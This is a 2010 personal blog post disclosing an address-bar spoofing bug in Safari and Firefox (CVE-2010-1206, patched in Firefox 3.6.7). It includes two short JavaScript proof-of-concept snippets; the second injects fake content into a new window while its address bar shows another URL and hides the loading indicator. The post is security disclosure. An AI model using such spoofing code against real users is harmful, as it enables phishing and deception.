This is a personal blog. My other stuff: book | home page | Twitter | G+ | CNC robotics | electronics

June 22, 2010

Yeah, about that address bar thing...

As promised, here's another interesting browser bug, showing the perils of being user-friendly.

You are probably familiar with the usual behavior of the address bar: when you click on a link, the browser keeps showing the old location up until the new content is retrieved and actually replaces the previous page. Only Safari behaves differently, always showing the new destination - which I think can be deceptive:

<input type=submit value="Click me!" onclick="clicked()">
<script>
function clicked() {
  w = window.open("", "_blank");
  w.document.body.innerHTML = "Where do I come from?";
  w.location = 'http://1.2.3.4/';
}
</script>
I don't like this behavior, but it perhaps does not constitute an outright security flaw: the spinning throbber is a weak, but visible indicator of foul play.

But to the point! If you look carefully at the remaining browsers, you may also notice a curious exception to the rule: when a link is opened in a new window or a tab, most browsers will put the destination URL in the address bar right away. Why? Apparently, usability is the reason: doing this seemed more user-friendly than showing about:blank for a couple of seconds.

Alas, this design decision creates an interesting vulnerability in Firefox: the about:blank document actually displayed in that window while the page is loading is considered to be same origin with the opener; the attacker can inject any content there - and still keep his made up URL in the address bar.

Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use an URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
  w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
  setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
}
</script>

Reported early April, CVE-2010-1206; Mozilla addressed the glitch in release 3.6.7.

2 comments:

  1. it seems very similar to this => http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html
    and it was reported before :)

    ReplyDelete
  2. Not similar at all - SOP "spoofing" is not a big deal.

    ReplyDelete